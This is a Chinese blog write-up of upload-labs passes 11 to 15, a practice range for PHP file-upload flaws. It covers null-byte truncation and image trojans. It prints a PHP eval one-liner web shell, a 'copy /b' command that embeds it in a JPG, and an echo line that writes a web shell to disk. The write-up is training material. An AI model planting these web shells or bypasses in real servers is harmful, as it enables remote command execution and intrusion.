<!DOCTYPE html>



  

<script type="text/javascript" src="/lib/clipboard/clipboard.js"></script>
<script type="text/javascript" src="/js/src/custom.js"></script>
<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon-32x32-next.png?v=5.1.4" color="#222">





  <meta name="keywords" content="文件上传,">





  <link rel="alternate" href="/atom.xml" title="MuseLJH's blog" type="application/atom+xml">






<meta name="description" content="关于upload-labs Pass 11 ~ 15的writeup">
<meta name="keywords" content="文件上传">
<meta property="og:type" content="article">
<meta property="og:title" content="upload-labs-writeup 11 ~ 15">
<meta property="og:url" content="https://museljh.github.io/2019/02/13/upload-labs-writeup 11~15/index.html">
<meta property="og:site_name" content="MuseLJH&#39;s blog">
<meta property="og:description" content="关于upload-labs Pass 11 ~ 15的writeup">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://museljh.github.io/images/fly.png">
<meta property="og:image" content="https://i.imgur.com/hiUxIwF.png">
<meta property="og:image" content="https://i.imgur.com/j3nJ4hh.png">
<meta property="og:image" content="https://i.imgur.com/MmjmIIz.png">
<meta property="og:image" content="https://i.imgur.com/acnnxVI.png">
<meta property="og:image" content="https://i.imgur.com/XEsYSR3.png">
<meta property="og:image" content="https://i.imgur.com/SIB1B90.png">
<meta property="og:image" content="https://i.imgur.com/2wU5AFl.png">
<meta property="og:image" content="https://i.imgur.com/sC8UfVD.png">
<meta property="og:image" content="https://i.imgur.com/lnBgbIr.png">
<meta property="og:image" content="https://i.imgur.com/VVVqh3g.png">
<meta property="og:image" content="https://i.imgur.com/xmvYDpi.png">
<meta property="og:image" content="https://i.imgur.com/c0nkpZb.png">
<meta property="og:image" content="https://i.imgur.com/8nn3B4q.png">
<meta property="og:image" content="https://i.imgur.com/1bjaxFc.png">
<meta property="og:image" content="https://i.imgur.com/Cf3BuYH.png">
<meta property="og:image" content="https://i.imgur.com/KWqDaSJ.png">
<meta property="og:image" content="https://i.imgur.com/V6Hvf47.png">
<meta property="og:image" content="https://i.imgur.com/rh9zcwU.png">
<meta property="og:image" content="https://i.imgur.com/9cRo2o7.png">
<meta property="og:image" content="https://i.imgur.com/2QkAD0w.png">
<meta property="og:image" content="https://i.imgur.com/20jZLJY.png">
<meta property="og:image" content="https://i.imgur.com/mxurp6J.png">
<meta property="og:image" content="https://i.imgur.com/Va5qtza.png">
<meta property="og:image" content="https://i.imgur.com/JDSwfKY.png">
<meta property="og:updated_time" content="2019-02-13T03:32:24.002Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="upload-labs-writeup 11 ~ 15">
<meta name="twitter:description" content="关于upload-labs Pass 11 ~ 15的writeup">
<meta name="twitter:image" content="https://museljh.github.io/images/fly.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://museljh.github.io/2019/02/13/upload-labs-writeup 11~15/">





  <title>upload-labs-writeup 11 ~ 15 | MuseLJH's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

<a href="https://github.com/MuseLJH" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

  <div class=" page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">MuseLJH's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">MuseLJH's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://museljh.github.io/2019/02/13/upload-labs-writeup 11~15/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="MuseLJH">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/LJH.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="MuseLJH's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">upload-labs-writeup 11 ~ 15</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-02-13T11:15:54+08:00">
                2019-02-13
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/writeup/" itemprop="url" rel="index">
                    <span itemprop="name">writeup</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                  <span class="post-meta-divider">|</span>
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.3k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  4
                </span>
              
            </div>
          

          
              <div class="post-description">
                  关于upload-labs Pass 11 ~ 15的writeup
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="/images/fly.png" alt=""></p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><blockquote>
<p>upload-labs是一个基于php语言的上传漏洞的靶场项目包括(最新commit17ec936) 的19个上传关卡的方法。可以通过git clone <a href="https://github.com/c0ny1/upload-labs.git" target="_blank" rel="noopener">https://github.com/c0ny1/upload-labs.git</a> 来搭建属于自己的一个upload练习靶场</p>
</blockquote>
<h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><p><img src="https://i.imgur.com/hiUxIwF.png" alt=""></p>
<h3 id="Pass-011-00截断-GET"><a href="#Pass-011-00截断-GET" class="headerlink" title="Pass-011 %00截断 GET"></a>Pass-011 %00截断 GET</h3><p>直接看源码<br><img src="https://i.imgur.com/j3nJ4hh.png" alt=""><br>这题明显是白名单，与之前黑名单不同只能允许jpg，png，gif的文件<br>感觉可以使用00截断</p>
<blockquote>
<p>strrpos — 计算指定字符串在目标字符串中最后一次出现的位置</p>
</blockquote>
<blockquote>
<p>strrpos ( string $haystack , string $needle [, int $offset = 0 ] ) : int</p>
</blockquote>
<p><img src="https://i.imgur.com/MmjmIIz.png" alt=""></p>
<p>这段大概意思是截取文件后缀的意思<br>CVE-2015-2348<br>影响版本：5.4.x&lt;= 5.4.39, 5.5.x&lt;= 5.5.23, 5.6.x &lt;= 5.6.7<br>exp：move_uploaded_file($_FILES[‘name’][‘tmp_name’],”/file.php\x00.jpg”);<br><img src="https://i.imgur.com/acnnxVI.png" alt=""><br><img src="https://i.imgur.com/XEsYSR3.png" alt=""><br>这里的image_path是可以控制的<br>在url中%00表示ascll码中的0 ，而ascii中0作为特殊字符保留，表示字符串结束，所以当url中出现%00时就会认为读取已结束。<br>但是有环境限制：</p>
<blockquote>
<p>php版本要小于5.3.4，5.3.4及以上已经修复该问题<br>magic_quotes_gpc需要为OFF状态</p>
</blockquote>
<p><img src="https://i.imgur.com/SIB1B90.png" alt=""><br>结果<br><img src="https://i.imgur.com/2wU5AFl.png" alt=""><br>故我们就可以这样做<br>好吧，大概环境不行  因为这里要满足is_path 估计这样搞就不是path了吧，</p>
<h3 id="Pass-012-00截断-POST"><a href="#Pass-012-00截断-POST" class="headerlink" title="Pass-012 %00截断 POST"></a>Pass-012 %00截断 POST</h3><p>直接看源码<br><img src="https://i.imgur.com/sC8UfVD.png" alt=""><br>依旧是使用白名单，和之前不同在于<br><img src="https://i.imgur.com/lnBgbIr.png" alt=""><br>save_path由get改成了post<br>依旧是%00截断，但是有一个区别在于post不会自动将其url解码<br>所以我们要先将%00进行url解码后才行（就是个空格吧？）<br><img src="https://i.imgur.com/VVVqh3g.png" alt=""><br>反正我是不可以的。</p>
<h3 id="Pass-013-图片马"><a href="#Pass-013-图片马" class="headerlink" title="Pass-013 图片马"></a>Pass-013 图片马</h3><p>源码<br><img src="https://i.imgur.com/xmvYDpi.png" alt=""><br>一眼看上去，这题的画风和之前有很大不同阿</p>
<blockquote>
<p>unpack - 从二进制字符串中解压缩数据<br>unpack （ string $format ， string $data [， int $offset= 0 ]）： array</p>
</blockquote>
<blockquote>
<p>intval — 获取变量的整数值<br>intval ( mixed $var [, int $base = 10 ] ) : int</p>
</blockquote>
<p>大概意思就是取文件末尾的后缀的二进制数<br>然后unpack进行二进制解包变成char，<br>后将其转化为int 与jap、png、gif的int数会不会相等，相等就上传成功，之前的00截断是肯定用不上的，要怎么做呢？<br>图片马，没错，我也是刚刚知道有这么回事，居然有这么骚的操作。<br>具体可以看</p>
<blockquote>
<p><a href="http://gv7.me/articles/2017/picture-trojan-horse-making-method/" target="_blank" rel="noopener">http://gv7.me/articles/2017/picture-trojan-horse-making-method/</a></p>
</blockquote>
<p>准备一张正常图片（a.jpg）,新建一个文件内容写入以下代码（b.php）</p>
<blockquote>
<?php @eval($_POST['cmd']);?>
</blockquote>
<p>使用以下命令生成图片木马muma.jpg</p>
<blockquote>
<p>   copy  a.jpg /b + b.php /a = muma.jpg</p>
</blockquote>
<blockquote>
<p>参数/b指定以二进制格式复制、合并文件(图片),参数/a指定以ASCII格式复制、合并文件（php文件），x.php文件里为要写的一句话木马</p>
</blockquote>
<p>然而</p>
<p><img src="https://i.imgur.com/c0nkpZb.png" alt=""></p>
<p>换种方法<br>使用二进制编辑工具（比如winhex,utrl editor等等）直接写恶意代码到文件尾部。<br>这里我使用winhex给大家演示<br><img src="https://i.imgur.com/8nn3B4q.png" alt=""><br>访问后<br><img src="https://i.imgur.com/1bjaxFc.png" alt=""><br>没反应？？？<br>难道是我打开的姿势不对<br>我要换个姿势打开<br><img src="https://i.imgur.com/Cf3BuYH.png" alt=""><br>卧槽这么神奇，<br>马萨卡？之前的也可以用这么搞吗，换成12关试试<br><img src="https://i.imgur.com/KWqDaSJ.png" alt=""><br>还是上传成功了，图片🐎恐怖如斯<br><img src="https://i.imgur.com/V6Hvf47.png" alt=""><br>还有谁，还有什么可以阻止图片🐎的吗<br>不过，这个图片🐎应该还是要结合文件包含漏洞的，<br>试试看，菜刀能不能连上这个图片🐎<br><img src="https://i.imgur.com/rh9zcwU.png" alt=""><br>貌似不可以<br>额，原来我漏了一段url，图片🐎是可以作为webshell的<br>（啧啧，斗🐎强者恐怖如斯）<br>不过我们也可以利用图片马加上代码执行，可以生成一个webshell</p>
<blockquote>
<p>如：echo“<?php @eval($_POST['caidao']);?>” &gt; x.php</p>
</blockquote>
<p>具体可以看</p>
<blockquote>
<p><a href="https://blog.csdn.net/Breeze_CAT/article/details/80044676#%E5%A4%B4%E5%83%8F%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC" target="_blank" rel="noopener">https://blog.csdn.net/Breeze_CAT/article/details/80044676#%E5%A4%B4%E5%83%8F%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC</a></p>
</blockquote>
<p>顺便了解下jpg/png/gif的头部格式<br>每种类型的图片内容最开头会有一个标志性的头部，这个头部被称为文件幻数。<br>jpg<br><img src="https://i.imgur.com/9cRo2o7.png" alt=""><br>文件头值为FFD8FFE000104A464946<br>png<br><img src="https://i.imgur.com/2QkAD0w.png" alt=""><br>网上传是89504E47（然而貌似不是）会使getimagesize函数和exif_imagetype函数报错（虽然我感觉是这个）<br>但是别的大神实测是89504E470D0A1A0A<br>gif 是 文件头值为474946383961</p>
<h3 id="Pass-014-图片马"><a href="#Pass-014-图片马" class="headerlink" title="Pass-014 图片马"></a>Pass-014 图片马</h3><p>即使没有看源码图片🐎依旧上传成功，不过我们还是看下源码看一下有没有其他的利用方式<br><img src="https://i.imgur.com/20jZLJY.png" alt=""></p>
<blockquote>
<p>image_type_to_extension — 取得图像类型的文件后缀<br>image_type_to_extension ( int $imagetype [, bool $include_dot = TRUE ] ) : string</p>
</blockquote>
<blockquote>
<p>getimagesize — 取得图像大小<br>getimagesize ( string $filename [, array &amp;$imageinfo ] ) : array</p>
</blockquote>
<p>感觉这种写法就是上面那题的变种写法<br>getimagesize函数只是对文件头部进行检测，只要文件头部正确就可以了<br>但是图片内容最好要符合php规则，不然会导致报错而无法执行我们想要的代码</p>
<h3 id="Pass-015-图片马"><a href="#Pass-015-图片马" class="headerlink" title="Pass-015 图片马"></a>Pass-015 图片马</h3><p>继续上传图片🐎<br><img src="https://i.imgur.com/mxurp6J.png" alt=""><br>what？咋没了<br>看下源码<br><img src="https://i.imgur.com/Va5qtza.png" alt=""><br>貌似是一个php_exif没有开<br>我就不开了<br><img src="https://i.imgur.com/JDSwfKY.png" alt=""><br>打开应该就可以了，额，我就不演示了，<br>exif_imagetype和getimagesize都是对文件头部进行检测，所以，<br>冲啊，图片🐎</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><blockquote>
<p><a href="http://lawlietweb.com/2018/06/07/upload-labs/#%E7%AC%AC%E5%8D%81%E4%B8%80%E5%85%B3" target="_blank" rel="noopener">http://lawlietweb.com/2018/06/07/upload-labs/#%E7%AC%AC%E5%8D%81%E4%B8%80%E5%85%B3</a></p>
</blockquote>

      
    </div>
    
    
    
    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2019/02/13/upload-labs-writeup 11~15/">upload-labs-writeup 11 ~ 15</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 MuseLJH 的个人博客">MuseLJH</a></p>
  <p><span>发布时间:</span>2019年02月13日 - 11:15</p>
  <p><span>最后更新:</span>2019年02月13日 - 11:32</p>
  <p><span>原始链接:</span><a href="/2019/02/13/upload-labs-writeup 11~15/" title="upload-labs-writeup 11 ~ 15">https://museljh.github.io/2019/02/13/upload-labs-writeup 11~15/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://museljh.github.io/2019/02/13/upload-labs-writeup 11~15/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
      $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
        });
    });  
</script>


      
    </div>
    <div>
     
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------END-------------</div>
    
</div>

      
    </div>
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/文件上传/" rel="tag"><i class="fa fa-tag"></i> 文件上传</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/12/对于利用gopher进行ssrf的学习与理解/" rel="next" title="对于利用gopher进行ssrf的学习与理解">
                <i class="fa fa-chevron-left"></i> 对于利用gopher进行ssrf的学习与理解
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/14/hackme web wp/" rel="prev" title="hackme web wp">
                hackme web wp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/LJH.jpg" alt="MuseLJH">
            
              <p class="site-author-name" itemprop="name">MuseLJH</p>
              <p class="site-description motion-element" itemprop="description">web手</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">25</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/MuseLJH" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:1049135835@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/MuseLJHX" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#正文"><span class="nav-number">2.</span> <span class="nav-text">正文</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-011-00截断-GET"><span class="nav-number">2.1.</span> <span class="nav-text">Pass-011 %00截断 GET</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-012-00截断-POST"><span class="nav-number">2.2.</span> <span class="nav-text">Pass-012 %00截断 POST</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-013-图片马"><span class="nav-number">2.3.</span> <span class="nav-text">Pass-013 图片马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-014-图片马"><span class="nav-number">2.4.</span> <span class="nav-text">Pass-014 图片马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Pass-015-图片马"><span class="nav-number">2.5.</span> <span class="nav-text">Pass-015 图片马</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">3.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
